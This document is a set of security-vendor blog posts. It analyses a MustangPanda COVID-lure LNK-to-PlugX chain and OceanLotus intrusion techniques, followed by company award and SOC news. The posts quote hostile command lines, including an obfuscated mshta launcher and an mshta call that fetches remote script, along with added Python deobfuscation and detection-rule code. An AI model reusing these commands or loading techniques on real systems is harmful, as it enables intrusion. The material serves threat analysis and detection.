Author: Aishee

MustangPanda – COVID 19 Malware
07 Mar

I / Introduction

Recently, with the complicated development of COVID-19, many hacker groups have taken advantage of the situation to conduct APT campaigns aimed at organizations around the world, and such campaigns have also appeared in Vietnam.

Taking advantage of the stressful COVID-19 situation, malicious code similar to that developed by the Panda hacker group was found impersonating three government notices about the outbreak in order to deceive users. The malware was delivered in a file posing as a Word document titled "Chi Thi thuong nguyen xuan phuc"; this sample was collected by us through the CMC Threat Intelligence system.

Through the Threat Intelligence system, this malicious sample has been linked to some recent samples that we have already issued warnings about:

CMC WARNING NEW APT CAMPAIGN ADVANTAGES UNIKEY ATTACKING USERS IN VIETNAM

CMC CYBER SECURITY ANALYSIS OF LNK MALWARE FORM OF APT PANDA GROUP


II / Detail

FILE LNK

The sample is a shortcut file with the ".lnk" extension, disguised as a Word file to deceive users because Windows hides the ".lnk" extension. However, this "Word file" has a suspicious target. Normally a shortcut's target points to a destination folder or file, but the target of this sample contains a command of the form:

%comspec% /c for %x in (%temp%=%) do for /f "delims==" %i in ('dir "%x\Chi Thi thuong nguyen xuan phuc.lnk" /s /b') do start m%windir:~-1,1%hta.exe "%i"

The above command is obfuscated: it uses the variable %comspec% instead of directly calling the string "cmd.exe", and the "s" in the file name mshta.exe is obtained by taking the last character of the variable %windir% (usually C:\Windows). Mshta.exe is a Microsoft application for quickly building applications from HTML, CSS, VBScript and JavaScript. Using mshta and the .hta file format, an HTML page can be opened as an application. The hta format is the same as HTML; by adding a tag inside an HTML file we obtain an hta file that can be opened by mshta.

However, mshta tolerates data placed before the hta header. Taking advantage of this, the attacker prepended an lnk file, whose target command opens the file itself with mshta.exe, to the embedded .hta content. When the user opens the lnk file, the command in its target is executed and mshta.exe opens the same file to run the embedded hta.
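To recover what a target like this actually runs, here is an added example (not from the original post) that emulates the two cmd.exe tricks described above, plain %VAR% expansion and the %VAR:~start,length% substring syntax, against a constructed environment, and reports which binary names appear only after expansion. The environment values are assumptions.

```python
import re

# Constructed environment standing in for the victim's variables (assumed values).
ENV = {
    "COMSPEC": r"C:\Windows\system32\cmd.exe",
    "WINDIR": r"C:\Windows",
    "TEMP": r"C:\Users\victim\AppData\Local\Temp",
}

# %VAR:~start,length% (cmd.exe substring syntax) and plain %VAR%.
_SUBSTR = re.compile(r"%(\w+):~(-?\d+)(?:,(-?\d+))?%")
_PLAIN = re.compile(r"%(\w+)%")


def cmd_substring(value, start, length=None):
    """Emulate the substring rules cmd.exe applies to %VAR:~start,length%:
    a negative start counts from the end, a negative length drops that many
    characters from the end, a missing length means 'to the end'."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:
        return value[start:]
    end = n + length if length < 0 else start + length
    return value[start:end] if end > start else ""


def expand(command, env=ENV):
    """Expand variable references as cmd.exe would with the given environment.
    Unknown variables are left untouched, as are FOR variables such as %x or %i."""
    def substr(m):
        value = env.get(m.group(1).upper())
        if value is None:
            return m.group(0)
        length = int(m.group(3)) if m.group(3) is not None else None
        return cmd_substring(value, int(m.group(2)), length)
    command = _SUBSTR.sub(substr, command)
    return _PLAIN.sub(lambda m: env.get(m.group(1).upper(), m.group(0)), command)


# Binaries whose names a shortcut target has no business assembling at run time.
WATCHED = ("mshta", "cmd.exe", "powershell", "rundll32", "regsvr32", "wscript", "cscript")


def hidden_binaries(command, env=ENV):
    """Return watched binary names that appear only after expansion, i.e. that
    the raw target string hid behind variable tricks."""
    raw, expanded = command.lower(), expand(command, env).lower()
    return [name for name in WATCHED if name in expanded and name not in raw]


# The LNK target quoted in the post above.
LNK_TARGET = (
    '%comspec% /c for %x in (%temp%=%) do for /f "delims==" %i in '
    '(\'dir "%x\\Chi Thi thuong nguyen xuan phuc.lnk" /s /b\') '
    'do start m%windir:~-1,1%hta.exe "%i"'
)

if __name__ == "__main__":
    print(expand(LNK_TARGET))
    print(hidden_binaries(LNK_TARGET))  # ['mshta', 'cmd.exe']
```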

FILE HTA

By default, mshta.exe can execute both JavaScript and VBScript embedded in hta files using the related DLLs. When opened, the embedded hta has the following properties: minimized, not shown on the taskbar, no menu and no caption. Its sole task is to execute the malicious VBScript code.

When the VBScript is executed, it decodes three base64-encoded binary files and one document file and stores them in the %TEMP% folder.

The document file is then opened for the user.

In this attack the PlugX RAT is what ends up being executed:

3.exe is actually a clean file, but when executed it loads a malicious DLL.

To do this, the attacker only needs to find a DLL that 3.exe loads with the LoadLibrary function (in this case http_dll.dll), then create a malicious DLL with the same name as the LoadLibrary parameter and put it in the same directory as 3.exe. When LoadLibrary is called, 3.exe searches its own directory first and loads that DLL.

When "http_dll.dll" is loaded, it redirects execution of the PE file to a function in the DLL by changing the memory protection of the PE file's code via the VirtualProtect API and replacing the code with a push, ret pair.

The function in the malicious DLL reads the file http_dll.dat in the same directory. The file begins with a null-terminated string followed by data; the string is used as the decryption key for the data portion of the dat file.

Next, the malicious code allocates a new memory region and decrypts the data into it with an XOR algorithm using the string key from the dat file. The malware then changes the protection of this new region to PAGE_EXECUTE_READWRITE and executes the shellcode at this address.

The decrypted content is a raw PE file that has been cleverly merged with a shellcode starting at offset 0. This shellcode serves as a loader that maps the raw PE file so that it can execute.

First, the shellcode finds the base address of kernel32.dll and then resolves the functions LoadLibrary, GetProcAddress, ZwFlushInstructionCache and VirtualAlloc by comparing hashes of the names of the functions exported by kernel32.

Then the loader reads the PE header, maps the sections into the corresponding memory areas, applies relocations and resolves the Import Address Table of the file. Once completed, execution is passed to the DllMain function of this PE file.

Final Payload

Here, the malicious code retrieves a number of paths it will use, then decrypts a data section for use.

The decrypted result is a number of strings including the autorun key name and the C&C server IP. The malicious code then:

  • Copies the three executable files to the user's profile directory, or to the all-users profile directory if it has sufficient administrator rights.
  • Adds and locks an autorun entry so that the dropped executable is launched when the computer restarts. It also relaunches itself if this is its first run; the malware distinguishes a first run from later runs by passing an additional parameter on subsequent runs.
  • Creates a mutex and connects to the server to receive commands.
  • Opens a backdoor that allows an attacker to execute commands remotely.
  • Supports many different commands including uploading files and folders, listing folders, reading files, getting computer and user information, ...

III / Conclusion

The variety of attack and evasion techniques used during execution shows that the people behind the malware invested a lot of time in researching the target and developing the attack method accordingly. An APT is a malicious, carefully resourced attack intended to steal important information and cause damage to the organization. To prevent APT attacks, always prepare new countermeasures and perform ongoing monitoring to ensure the security of users and organizations alike.

HASH

SHA256: BBBEB1A937274825B0434414FA2D9EC629BA846B1E3E33A59C613B54D375E4D2
MD5: 60C89B54029442C5E131F01FF08F84C9
SHA1: 52873A2C81B1F462CDDF3C86B2103F74EF56F91E

C:\Users\admin\AppData\Local\Temp\3.exe: C3159D4F85CEB84C4A0F7EA9208928E729A30DDDA4FEAD7EC6257C7DD1984763
C:\Users\admin\AppData\Local\Temp\http_dll.dll: 79375C0C05243354F8BA2735BCD086DC8B53AF709D87DA02F9206685095BB035

C2

DOMAIN vietnam.zing.photos
IP 104.160.44.85

By ManhChich - UraSec Team - CMC SOC Center

The attack situation in China of the OceanLotus group, identified as originating from Vietnam
18 Dec

In the first half of 2019, according to Tencent's cybersecurity intelligence center, the OceanLotus group was publicly reported. The targets of this group are diverse, including government agencies, maritime authorities, diplomatic agencies, large state-owned enterprises, scientific research organizations and a number of large Chinese private enterprises.

Through tracking, Tencent discovered that a large number of domestic targets were attacked by this group: the entire intranet of the target was compromised, and a large amount of confidential information and server configuration data was stolen. The attackers appear to be very familiar with China, understanding its current hot topics and government structure. For example, when a tax reform had just been launched, a tax reform plan was immediately used as the subject of an attack.

Sea Lotus (OceanLotus), also known as APT32, is a cyber attack group identified by many organizations as originating from Vietnam. Since its inception, the group has carried out attacks on China as well as many other countries around the world.

The attack methods have not changed much since the first detection, but there are some small improvements to attack decoys, payloads, bypassing of security layers, etc., which are still in use. After gaining control of a machine, the attacker scans the entire network. This also shows that APT attacks will not stop until they reach their goal: as long as the target is valuable, the attack only gets stronger.

Characteristics of the attack

Attack by phishing email

Sea Lotus sends fake emails purporting to come from reputable organizations, so users are easily fooled into downloading malicious files themselves. Throughout 2019, many phishing emails were sent, such as the following:

The accounts used to send phishing emails are usually NetEase mailboxes. The hacked accounts are typically of the form Sun**@126[.]com, Yang**@163[.]com, insert**@126[.]com, ...

Diversify types of decoys
The group diversified the bait used for its attacks, and almost every kind of bait was used. In addition to malicious lnk and doc files, compressed files exploiting the WinRAR ACE vulnerability (CVE-2018-20250) are mentioned in many reports.

Malicious file as doc:

Decode Chm file

Winrar flaw (CVE-2018-20250)

Various ways to download files
Because of the variety of phishing decoys, the method of downloading malicious files also varies.

Direct execution

The executable file is disguised as a DOCX file with the Microsoft Word icon to trick users into downloading it. After the user downloads and opens the "DOC" file, the information in the document appears scrambled, enticing the victim to enable the macro code so that the content can be viewed. In fact, after macros are enabled, the normal content is still not displayed.

Use Rundll32 to download malicious dll
After executing the malicious code, it calls and executes the actual malicious payload {1888B763-A56C-4D4B-895C-2092993ECCBA} in the C:\Users\Administrator\AppData\Local\Microsoft folder, then uses Rundll32 to execute the DLL:

"C:\Windows\system32\rundll32.exe" "C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll",Register

Macro
Using a macro to execute, with obfuscated macro code:

Office memory executes malicious shellcode
Via macro code, the shellcode is decoded directly in Office and a thread is created to execute it in memory:

Use the DLL
Using the DLL side-loading technique to execute and download malicious files:


Execution

Register a malicious DLL as a system component to execute:

Embed command file
When the chm file is executed, it prompts to run ActiveX code:

Script content of file:

However, due to encoding issues, the chm appears truncated after opening:


After decompression, the original content is as follows:

Continuous attacks use scheduled tasks
After the chm is executed, the bcdsrv.dll file is dropped under %AppData%\Roaming and then a scheduled task called WeeklyMaintenance is created:

Execution command:

C:\Windows\System32\msiexec.exe -Y C:\Users\Administrator\AppData\Roaming\bcdsrv.dll

Bcdsrv.dll is the actual malicious file.

lnk calling mshta to execute

Detailed analysis of the lnk technique calling mshta

Once executed, the following command is called:

C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html

And news.html is actually a VBS file containing executable code.

Use odbcconf.exe to download the file
Odbcconf.exe is a file included with the system. It can be used to execute a DLL file, and because the host process is a system file, it may evade some security software:

WinRAR ACE vulnerability (CVE-2018-20250)
A compressed package exploiting this vulnerability can be structured as follows: in addition to extracting the normal files on decompression, it drops a self-extracting file into the startup folder (C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup):

This file is a self-extracting program. On startup, it drops the file {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx, then runs the command:

regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx
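To turn the execution techniques in the rundll32, scheduled task (msiexec -Y), mshta, odbcconf and regsvr32 sections above into something a SOC can alert on, here is an added example (not from the Tencent report or CMC) of command-line detection logic in Python, run over the command lines quoted in those sections plus constructed lines. The rule names, regular expressions, the odbcconf line and the benign lines are assumptions made for this example.

```python
import re

# Paths a standard user can write to; system binaries rarely have a reason to load code from here.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)

# (rule name, command-line pattern, extra path requirement or None)
RULES = [
    # msiexec -Y <dll> registers a module by calling its DllRegisterServer export
    ("msiexec_y_appdata_dll", re.compile(r"msiexec\.exe\b.*\s-y\s", re.I), USER_WRITABLE),
    # rundll32 loading a DLL that lives in a user-writable directory
    ("rundll32_appdata_dll", re.compile(r"rundll32\.exe\b", re.I), USER_WRITABLE),
    # silent regsvr32 install (/s /i) of a COM object dropped by the payload
    ("regsvr32_silent_install", re.compile(r"regsvr32(\.exe)?\s.*/s\s.*/i\s", re.I), None),
    # mshta fetching its script straight from a remote URL
    ("mshta_remote_url", re.compile(r"mshta\.exe\s+https?://", re.I), None),
    # odbcconf pointed at a DLL in a user-writable directory
    ("odbcconf_appdata_dll", re.compile(r"odbcconf(\.exe)?\b.*\.dll", re.I), USER_WRITABLE),
]


def detect(cmdline):
    """Return the names of all rules that match one process command line."""
    hits = []
    for name, pattern, path_req in RULES:
        if pattern.search(cmdline) and (path_req is None or path_req.search(cmdline)):
            hits.append(name)
    return hits


def scan(cmdlines):
    """Run every rule over a batch of command lines; yields (rule, command line) pairs."""
    return [(name, line) for line in cmdlines for name in detect(line)]


SAMPLE_COMMAND_LINES = [
    # the four command lines quoted in the sections above
    r'"C:\Windows\system32\rundll32.exe" "C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll",Register',
    r"C:\Windows\System32\msiexec.exe -Y C:\Users\Administrator\AppData\Roaming\bcdsrv.dll",
    r"C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html",
    r"regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx",
    # constructed odbcconf line with a placeholder DLL path
    r"odbcconf.exe /a {REGSVR C:\Users\Administrator\AppData\Local\Temp\placeholder.dll}",
    # constructed benign lines that must not fire
    r"C:\Windows\System32\msiexec.exe /i C:\Users\Administrator\Downloads\setup.msi",
    r'"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL',
]

if __name__ == "__main__":
    for rule, line in scan(SAMPLE_COMMAND_LINES):
        print(f"[{rule}] {line}")
```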

Multi-load attack
In the latest attacks, Sea Lotus used a multi-load attack. In previous attacks, after decoding the shellcode, the RAT was executed directly, such as:

We found that, after decoding the shellcode, a further shellcode is downloaded and executed first. If the download fails, the pre-installed RAT is loaded:

This makes the attack activity richer, more diverse and also more controllable.

The circumvention of security software
Sea Lotus also uses a variety of methods to evade security software, mainly:

Use the DLL to execute
Use executable system files
See odbcconf.exe above.

Execute shellcode directly in Office
Add junk data to the file to inflate its size
To prevent files from being collected by security vendors, Sea Lotus has intentionally added a large amount of junk data to the resources of certain files to inflate the file size.

A file padded with junk data can reach 61.4 MB (64,480,256 bytes):

Create a backdoor
The backdoor file is encrypted and customized according to the victim computer's properties. Therefore the file hash differs on each machine, and the file cannot be decoded without information about the machine that contains the backdoor. Even if the malware is found by security vendors, as long as there is no data about the infected computer, the payload cannot be decoded.

Disguise for CnC connection
According to the configuration information, various connection and camouflage methods can be used, and the C2 is assembled and resolved. CnC names are usually structured as follows (xxx is the C2 from the configuration):

{rand}.xxx

www6.xxx

cdn.xxx

api.xxx

Fake HTTP Headers:

Custom backdoor
One of the most impressive techniques used by Sea Lotus in 2019 (mostly for the phase 2 backdoor) has recently been published: the malicious file dropped on each victim machine is encrypted using properties of that computer (such as the hostname) and then executed. Part of this information is needed, otherwise it cannot be decoded.

Therefore each dropped malicious file is different, and even if it is found by a security vendor, as long as the victim's related data is unavailable, the actual payload cannot be decoded.

The backdoor is also executed via file and process pairs including AdobeUpdate.exe + goopdate.dll, KuGouUpdate.exe + goopdate.dll, XGFileCheck.exe + goopdate.dll, SogouCloud.exe + inetmib1.dll and other combinations.

The encryption process is:

The example below shows that the username was used for encryption.

The victim username is Cao**. It can be seen that the Trojan was created specifically to infect this computer.

Malware
Through the monitoring process, it was noticed that Sea Lotus often used three main types of malware: CobaltStrike's beacon Trojan, a modified Denis Trojan and the Ghost family. Of these, CobaltStrike's beacon Trojan and the Denis family are found most often, while Ghost is rarely used.

CobaltStrike:

Denis:

Ghost is modified:

Hacking the network
After a server has been infected with malware via a phishing email, Sea Lotus continues its attacks on internal machines. They scan, search and attack internal machines in as many ways as possible.

Get the hash:

Package file:

Scheduled tasks are also created to continuously download tools through PowerShell:

The malicious file was detected as goopdate.dll.

Some other activities

During the tracking process, several attacks similar to Sea Lotus attacks were found, such as:

The malicious code was eventually executed via two payload types:

Beacon payload created by CobaltStrike.
The remaining payload block, numverse_http, is used by Metasploit.

In addition, the CnC of these attacks is often located in China:

Although there have been recent attacks similar to Sea Lotus operations, there are also behaviors that differ from those of Sea Lotus.

Summary of Sea Lotus
Sea Lotus is one of the most active APT groups in recent years, regularly attacking targets in China and countries around the world. Many cybersecurity companies have consistently published reports about recent Sea Lotus attacks. The group currently shows no sign of stopping; it is constantly updating its attack technologies and techniques, causing a lot of difficulty for defenders. Therefore, users need to raise their security awareness, not execute attachments from unknown emails and not be fooled by phishing messages.

Safety recommendations

  • Raise security awareness: do not open attachments of unknown emails, and do not enable Office macros unless the source is reliable and the purpose is clear.
  • Install patches for the operating system and for important software such as Office in a timely manner.
  • Use antivirus software to prevent possible attacks such as Trojan horses.
  • Users and businesses should deploy an early threat detection system such as a SOC. A SOC system is currently the first choice of security teams.

The related IOC

MITRE ATT&CK

Source: mp.weixin.qq.com

RDoS ATTACKS BY FAKE FANCY BEAR
05 Dec

Recently, Threat Intelligence collected some information about ransom denial-of-service (RDoS) attacks, in which the attacker demands a ransom from victims in return for not attacking them.

The attackers extort money by sending threatening emails to the victims. Most of them use the name of the Fancy Bear group, borrowing its reputation to frighten victims. Posing as the infamous Fancy Bear, they threaten to launch a DDoS attack if the ransom is not paid. In some cases the attackers carried out small DDoS attacks to prove their capabilities and make the threat credible. These attacks have also been confirmed by other security researchers.

In the same period, CMC Cyber Security received a support request from an organization that had received the same threatening email.


Some organizations that received this threatening email also experienced a demonstration DDoS attack on their servers.

The attack vector (floods) uses the UDP and ICMP protocols; in particular the attacker was using UDP/3283, a newly discovered attack vector from 06/2019.

Port UDP/3283 is used by the Apple Remote Desktop (ARD) protocol and the ARMS service.

Fancy Bear, also known as APT28 (Sednit group, Sofacy, Pawn Storm, Strontium, Tsar Team, TG-4127, Group-4127, TAG_0700, Swallowtail, Iron Twilight, Group 74), has been operating since 2004. It is a hacker group that specializes in attacking large organizations and governments with APT campaigns.

We can confirm that the Fancy Bear group has nothing to do with ransom denial-of-service (RDoS) campaigns: their goal is mostly intrusion and espionage, whereas these attackers are after money. The Fancy Bear name is only borrowed to make the threat more convincing, a simple piece of social engineering.

The source IPs used by the attacker for the UDP flood during the RDoS attack are randomized.

CMC Cyber Security will only make part of this information public; for more details, please contact us.

There are many methods to mitigate this type of DDoS attack and they are not too difficult to implement. We will update the specific details as soon as possible.

VNISA awards the Excellent New Information Security Product 2018 title to CMC Infosec
10 Sep

VNISA has just awarded its 2018 information security product and service titles to CMC Infosec, with 3 prizes: High-quality Security Product, Typical Security Service and Excellent New Information Security Product 2018.

VNISA awarded the 2018 information security product and service titles to businesses.

Organized under the auspices of the Ministry of Information and Communications, the "High-quality Information Security (ATTT) Products" and "Typical Information Security Services" voting program is an annual activity run by the Vietnam Information Security Association (VNISA) since 2015 to evaluate, recognize and honor good quality ATTT products and services. The event was held at the Vietnam Information Safety Day 2018 international conference. New this year, the Voting Council unanimously agreed to propose the title "Excellent New ATTT Product" to encourage new and highly innovative security products.

At the announcement and award ceremony on the morning of November 30, 2018, Mr. Vu Lam Bang, Director of the CMC Infosec Product Research & Development Center, representing CMC Infosec, received all 3 awards: "High-quality Security Product", "Typical Security Service" and "Excellent New Security Product" 2018.

The titles "High-quality Security Product 2018" and "Typical Security Service 2018" are evaluated and voted on according to main criteria including application demand and efficiency, technology, product quality, market and support services, and market share. The CMC Internet Security Enterprise (CISE) anti-malware solution and the CMC Infosec penetration testing service received these two titles. In particular, the CISE solution integrates Artificial Intelligence to detect anomalies and to analyze and identify the behavior of malicious code, a solution researched and developed by CMC Infosec.

Notably, the new point of this year's voting program is the added title "Excellent New Security Product", to encourage new and highly innovative security products. In the first year of the award, the CMC NextGen SOC new-generation Information Security Management Center received the title. A SOC (Security Operation Center) is a center within an internal system that monitors, detects, quarantines and resolves incidents and is responsible for the security of network devices, security equipment, servers and workstations. CMC NextGen SOC combines 3 elements, Technology - Process - People, to monitor, detect and automatically react to all information security incidents, with outstanding AI - Machine Learning and Automation technology that allows early detection of abnormal signs. All technologies and processes of CMC SOC are developed and operated by Vietnamese engineers of CMC Infosec.

This year, the members of the Voting Council are all reputable managers and experts from a number of large agencies, organizations and enterprises in the security field, such as the Cyber Warfare Command of the Ministry of National Defense, the Department of Civil Cryptography Management and Cryptographic Product Testing of the Government Cipher Committee, and the Vietnam Computer Emergency Response Team (VNCERT) of the Ministry of Information and Communications. Mr. Vu Quoc Thanh, Vice President of VNISA, emphasized: "This year's program of the Vietnam Information Security Association selects complete products and services with high-quality information security features, originating from Vietnam and owned by Vietnamese enterprises and organizations. This year we have an additional category, Excellent New Security Products, because this field in Vietnam is quite new; products may not yet be on the market but need to be encouraged to develop with appropriate investment. In this category, the CMC SOC solution of CMC Infosec has been rated as good and of quality by the Voting Council, so it is promoted in the Vietnamese market."

Mr. Vu Lam Bang, Director of the CMC Infosec Product Research & Development Center, shared at the event: "This year, the organizers have a new prize for differentiated and pioneering products. We are the first company in Vietnam to build its own Information Security Management Center from start to finish, without procuring technology from any other party. Currently the CMC SOC of CMC Infosec is also highly appreciated by foreign organizations."

CMC Infosec was established in 2008 with the mission of developing information security products and services for individual and corporate customers, including anti-malware solutions and information security services. With a staff of 70 people, including more than 45 leading security and IT engineers and a team of experts with international qualifications and security certifications such as PCI QSA, ISO 27001 Lead Auditor and CEH, and with experience in handling many major information security incidents in Vietnam, 100% of the products and solutions CMC Infosec brings to market are researched and developed by Vietnamese people, flexible and tailored to the needs of a wide range of customers from the Government, finance and businesses to individual users. CMC Infosec is currently the only Vietnamese member of the Association of Anti-Virus Asia Researchers (AVAR) and the International Computer Security Association (ICSA); all products and services provided by CMC Infosec are rigorously tested to international standards and receive the support of security experts from these prestigious organizations.

After Viettel and Bkav, the Ministry of Information and Communications recognizes the anti-malware solutions of CMC and Veramine as meeting technical requirements
10 Sep

The list of anti-malware products meeting the technical requirements under the Prime Minister's Directive 14 has just been extended with two solutions from CMC and Veramine. Previously, two solutions from Bkav and Viettel were evaluated and recognized by the Ministry of Information and Communications.

The centralized anti-malware solution CMC Malware Detection and Defense is one of two new products added to the list of anti-malware products meeting the technical requirements under Directive 14 (Image: cmc.com.vn)

The Ministry of Information and Communications has just updated the list of anti-malware products that meet the technical requirements under the Prime Minister's Directive 14 of May 25, 2018, on improving the capacity to prevent and fight malicious software (referred to as malicious code).

Accordingly, 2 anti-malware products from 2 businesses have been evaluated and added to the above list by the Ministry of Information and Communications: the centralized anti-malware solution CMC Malware Detection and Defense (CMDD) of CMC Cyber Security and Security Limited (CMC Cyber Security), and Veramine Advanced Endpoint Security Suite (VAESS), an active threat detection, response and defense suite for endpoints in the network (including servers and workstations) from Veramine.

Earlier this year, the Ministry of Information and Communications assessed and recognized two anti-malware products as meeting the technical requirements under the Prime Minister's Directive 14: the overall antivirus solution for endpoints Bkav Endpoint AI from Bkav antivirus software joint stock company, and the targeted-attack detection and prevention solution for endpoints (Viettel Endpoint Detection & Response - VEDR) from Viettel Network Security Company of Viettel Group.

The anti-malware products of Viettel, Bkav, CMC and Veramine that the Ministry of Information and Communications has assessed and certified as meeting the technical requirements under Directive 14 are products and solutions that meet the criteria specified in the Prime Minister's Directive 14 on improving malware prevention and control capabilities, namely: a function allowing centralized management; 24/7 technical support and the ability to react promptly in detecting, analyzing and removing malware; the ability to share malware information and statistical data with the technical systems of competent authorities; and compliance with the standards, technical regulations and professional guidance of the Ministry of Information and Communications.

Regarding CMC Malware Detection and Defense, one of the two anti-malware products newly added to the list, CMC said that this solution was developed on the basis of CMC Internet Security Enterprise (CISE) and is a solution that helps agencies and organizations detect and defend against the threat of malicious code on workstations with a centralized monitoring system. Specifically, the solution has outstanding features such as: shielding personal computers from the risk of malware attacks; monitoring abnormal activities that may cause harm on computers; and detecting vulnerabilities, malware and dangerous connections.

At the same time, the active monitoring system from CMC Cyber Security makes it possible to identify risks to customers immediately; support and rescue services minimize the risks to customers when attacks occur; and information security status reports are provided to customers quickly, promptly and completely.

As for Veramine Advanced Endpoint Security Suite (VAESS) from Veramine, information from Cyberlab, the distributor of this solution in Vietnam, says that VAESS can collect diverse information from the operating system kernel up to user sessions to identify any suspicious behavior on endpoints.

The suite also uses a variety of flexible mechanisms to respond to detected abnormal behavior, such as interrupting or pausing processes or sessions, or quarantining an endpoint or a process from the network; it carries out active defense by creating a trap system for malicious code and hackers on endpoints in order to monitor and prevent their activities on those endpoints.

In addition, VAESS ensures that sufficient evidence is available during the forensics process, and adds other advanced features to combat internal threats such as user, data and peripheral management.

In particular, VAESS supports a variety of platforms including Windows versions and Linux distributions, and will soon be supported on macOS.

Solving the problem of building a Security Operations Center for the banking sector
10 Sep

A Security Operations Center (SOC) is a "not strange but still new" concept for agencies and organizations in Vietnam, especially in the banking sector. So what is the right approach to building an effective SOC, consistent with the digital development of Vietnamese banks?

Security Operations Center (SOC) - "not strange but still new"

In developed countries in the region such as Japan, Singapore and Hong Kong, the construction and operation of SOCs to comprehensively control and improve the defenses of organizations' IT systems has received much attention. Since 2004, the SOC has become an integral part of the activities of government organizations, multinational corporations and large banks. According to a Gartner report, by the end of 2019 about 50% of large Asian corporations will run their security management activities through a SOC.

Grasping this trend and indispensable demand, over the last 2 years Vietnamese banks have planned to develop SOCs. However, familiarity with the concept of a SOC does not mean that a bank is "used to" operating a complete SOC and knows how to do so. In fact, banks have encountered a number of problems.

Firstly, in terms of technology, some banks have initially invested in security monitoring systems (SIEM) and purchased equipment and technologies from many different companies, leading to decentralized and unsynchronized SOC operation and management. Continuously keeping up with new attack methods and technologies is also a challenge for non-specialized security units. Secondly, in terms of human resources, banks have begun to hire full-time personnel, but they encounter difficulties in training and retaining high-quality staff. Thirdly, the investment budget is very large. The investment costs, including SIEM, forensics, log/backup solutions, hardware and monitoring equipment for digital investigations, are estimated at about US $1,300,000. This cost does not include annual operating, troubleshooting and management costs.

Outsourcing SOC services - time efficiency, cost savings, optimal resources

According to Mr. Ha The Phuong, Deputy General Director of CMC InfoSec, the unit that built and develops CMC NextGen SOC, experts divide the development level of a SOC into 6 levels. Specifically: Level 1 - IT department personnel or software monitor the security status; Level 2 - partially integrated into a Network Operations Center (NOC); Level 3 - a SOC exists, with technology and reporting operations separated from the IT department; Level 4 - problems are solved with dedicated resources (development, analysis, troubleshooting); Level 5 - identified threats are brought under control; Level 6 - a combination of prevention, surveillance, detection, quick response and continuous improvement.

In Vietnam, CMC NextGen SOC has reached level 5. In addition to controlling identified threats, this CMC center also integrates artificial intelligence (AI) and the first Automation technology in Vietnam, has partners to assist in combating new threats, and has a DevOps team and consultants to meet the special needs of organizations and banks.

Therefore, the most reasonable plan for banks at this time is to outsource the SOC service package (SOC-as-a-Service) or, if they already have a SIEM system, to cooperate with a service provider. In the other SOC case (consultancy), the provider advises on management, manpower and process instead of the bank developing an internal (in-house) SOC. In the hybrid case, when the bank has already invested in a technology system, SOC service providers can integrate their own solutions to ensure compatible operation, provide incident handling procedures and supply resources. However, the best choice is still to outsource the SOC service package. The bank then chooses the most comprehensive and appropriate service provider, with technology, experts and specialized personnel already available, and solves the investment cost problem by spending 6 to 12 times less than developing the system itself, while minimizing risk because system administration is more centralized.

Based on the experience of consulting on and deploying outsourced SOC services for banks, Mr. Phuong said: "The outsourcing of SOC services is completely consistent with the trend of moving from investment costs to operating costs. Bankers want to build a sustainable defense system. Not only that, banks will not have difficulty securing resources when they only need a focal point, combined with the service provider's reporting and troubleshooting, and can still monitor 24/7."